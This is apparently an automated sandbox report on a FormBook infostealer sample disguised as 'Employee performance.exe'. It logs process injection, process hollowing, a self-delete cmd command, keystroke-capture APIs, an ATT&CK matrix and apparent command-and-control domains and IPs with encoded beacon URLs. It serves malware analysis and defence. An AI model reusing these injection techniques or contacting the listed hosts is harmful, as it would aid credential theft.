Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]	2_2_035BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]	2_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]	2_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]	2_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]	2_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]	2_2_035B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]	2_2_035C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]	2_2_035649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_035FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]	2_2_035C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]	2_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]	2_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_035BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]	2_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]	2_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]	2_2_03560854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]	2_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]	2_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]	2_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]	2_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]	2_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]	2_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]	2_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]	2_2_035BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_01030B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_01030B62

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01002622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01002622
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FF083F
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF09D5 SetUnhandledExceptionFilter,	0_2_00FF09D5
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FF0C21
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_009042F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_009042F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_00904550 SetUnhandledExceptionFilter,	10_2_00904550

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 47.242.64.82 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.209.131 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.90.157.77 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 4056			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 4056			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: 900000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Employee performance.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 954008

Jump to behavior

Source: C:\Users\user\Desktop\Employee performance.exe

0_2_01031201

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_01012BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_01012BA5

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0103B226 SendInput,keybd_event,

0_2_0103B226

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0103E355 mouse_event,

0_2_0103E355

Source: C:\Users\user\Desktop\Employee performance.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Employee performance.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Employee performance.exe

0_2_01030B62

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_01031663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_01031663

Source: Employee performance.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Employee performance.exe, explorer.exe, 00000003.00000000.1268404306.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3733157551.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3730463834.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.3730463834.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1264202530.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.3730463834.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1264202530.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000003.00000002.3719950335.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1263493147.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000003.00000002.3730463834.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1264202530.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_00FF0698 cpuid

0_2_00FF0698

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_01048195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_01048195

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0102D27A GetUserNameW,

0_2_0102D27A

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0100B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0100B952

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00FD42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: Employee performance.exe	Binary or memory string: WIN_81
Source: Employee performance.exe	Binary or memory string: WIN_XP
Source: Employee performance.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Employee performance.exe	Binary or memory string: WIN_XPe
Source: Employee performance.exe	Binary or memory string: WIN_VISTA
Source: Employee performance.exe	Binary or memory string: WIN_7
Source: Employee performance.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01051204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_01051204
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01051806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_01051806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 Credential API Hooking	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	215 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	612 Process Injection	1 Rootkit	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Employee performance.exe	66%	ReversingLabs	Win32.Trojan.Strab
Employee performance.exe	66%	Virustotal		Browse
Employee performance.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?t	0%	Avira URL Cloud	safe
https://word.office.com	0%	URL Reputation	safe
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	0%	Avira URL Cloud	safe
http://www.antoni-tapies.com/lm31/?IR-4WR=QbCUt2+YIZlz+dwxAAtvOjK27in0zgvhNSRWcpAaxjKea8/898cVmCp5yUX+CKoU4c8tg+UM8w==&vN=I0D4IvR	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
http://www.ladonbet.xyz/lm31/www.09gmpvp51.com	100%	Avira URL Cloud	malware
http://www.loki360store.com/lm31/	0%	Avira URL Cloud	safe
http://www.webxwhiz.com	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
http://www.webxwhiz.com/lm31/?IR-4WR=ouOH1iLlZSoKQO8ZGquF9b4n2bh5CptaW8ZUOykV+DLPuA7sqI/QypE0IRpCwT+0rd/MZIKfKw==&vN=I0D4IvR	0%	Avira URL Cloud	safe
http://www.antoni-tapies.com/lm31/	0%	Avira URL Cloud	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
http://www.kovacsking.shop	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	URL Reputation	safe
http://www.delkhah-shop.comReferer:	0%	Avira URL Cloud	safe
http://www.09gmpvp51.com/lm31/www.greate-electronics.com	0%	Avira URL Cloud	safe
http://www.kovacsking.shopReferer:	0%	Avira URL Cloud	safe
http://www.loki360store.com/lm31/?vN=I0D4IvR&IR-4WR=3v9Mk5D4UG1ohOatnU60InV+BzHoz0n3lpHv5U7ut2amd93313AWpc+Mp9wa3RzchSXkA2ty2w==	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://www.antoni-tapies.com/lm31/www.hbvc.xyz	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	0%	Avira URL Cloud	safe
http://www.09gmpvp51.com	0%	Avira URL Cloud	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.loki360store.comReferer:	0%	Avira URL Cloud	safe
www.ladonbet.xyz/lm31/	100%	Avira URL Cloud	malware
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://www.malarosa.com/lm31/www.k5h2o.top	0%	Avira URL Cloud	safe
http://schemas.microsoft.	0%	URL Reputation	safe
https://wns.windows.com/	0%	Avira URL Cloud	safe
http://www.warpateam.com/lm31/?IR-4WR=je5vN1uA9yEmYEN49dayIwTCku09UgHsksm87SEwvw14I11Hwk0s9tmois1WiUPsr2unY/WNgA==&vN=I0D4IvR	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	0%	URL Reputation	safe
http://www.loki360store.com/lm31/www.warpateam.com	0%	Avira URL Cloud	safe
http://www.09gmpvp51.comReferer:	0%	Avira URL Cloud	safe
http://www.sweatxin.com/lm31/www.17eclbet.com	0%	Avira URL Cloud	safe
http://www.hbvc.xyzReferer:	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Avira URL Cloud	safe
http://www.k5h2o.top	0%	Avira URL Cloud	safe
http://www.malarosa.com/lm31/	0%	Avira URL Cloud	safe
http://www.antoni-tapies.comReferer:	0%	Avira URL Cloud	safe
http://www.17eclbet.com	0%	Avira URL Cloud	safe
http://www.ladonbet.xyzReferer:	0%	Avira URL Cloud	safe
http://www.k5h2o.topReferer:	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
http://www.greate-electronics.com/lm31/?vN=I0D4IvR&IR-4WR=FoA+CglQbpkHnr+s7aBTRxGJK1Wdi0lwi/HX1clno50Ms2pZyKjp81NiBNziFvW0ERkZpCilTw==	0%	Avira URL Cloud	safe
http://www.hbvc.xyz/lm31/	0%	Avira URL Cloud	safe
http://www.loki360store.com	0%	Avira URL Cloud	safe
http://www.rtpgacordewa288.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	0%	Avira URL Cloud	safe
http://www.antoni-tapies.com	0%	Avira URL Cloud	safe
https://www.pollensense.com/	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Avira URL Cloud	safe
http://www.delkhah-shop.com/lm31/www.dr-shahmoradi.com	0%	Avira URL Cloud	safe
http://www.17eclbet.com/lm31/www.webxwhiz.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	0%	Avira URL Cloud	safe
http://www.webxwhiz.com/lm31/www.kovacsking.shop	0%	Avira URL Cloud	safe
http://www.dr-shahmoradi.comReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	0%	Avira URL Cloud	safe
http://www.kovacsking.shop/lm31/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	0%	Avira URL Cloud	safe
http://www.rtpgacordewa288.comReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	0%	Avira URL Cloud	safe
http://www.webxwhiz.comReferer:	0%	Avira URL Cloud	safe
http://www.malarosa.com	0%	Avira URL Cloud	safe
http://www.k5h2o.top/lm31/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	0%	Avira URL Cloud	safe
http://www.17eclbet.comReferer:	0%	Avira URL Cloud	safe
http://www.hbvc.xyz	0%	Avira URL Cloud	safe
http://www.17eclbet.com/lm31/	0%	Avira URL Cloud	safe
http://www.sweatxin.comReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	0%	Avira URL Cloud	safe
http://www.warpateam.com/lm31/www.ladonbet.xyz	0%	Avira URL Cloud	safe
http://www.17eclbet.com/lm31/?vN=I0D4IvR&IR-4WR=FBWSmpNgcXV4Z7KuJkJmdDxUaYIsSjlTtHPGPH3H6ne0varfGF0HjaluKEQFNPCXvpsJxm6uZg==	0%	Avira URL Cloud	safe
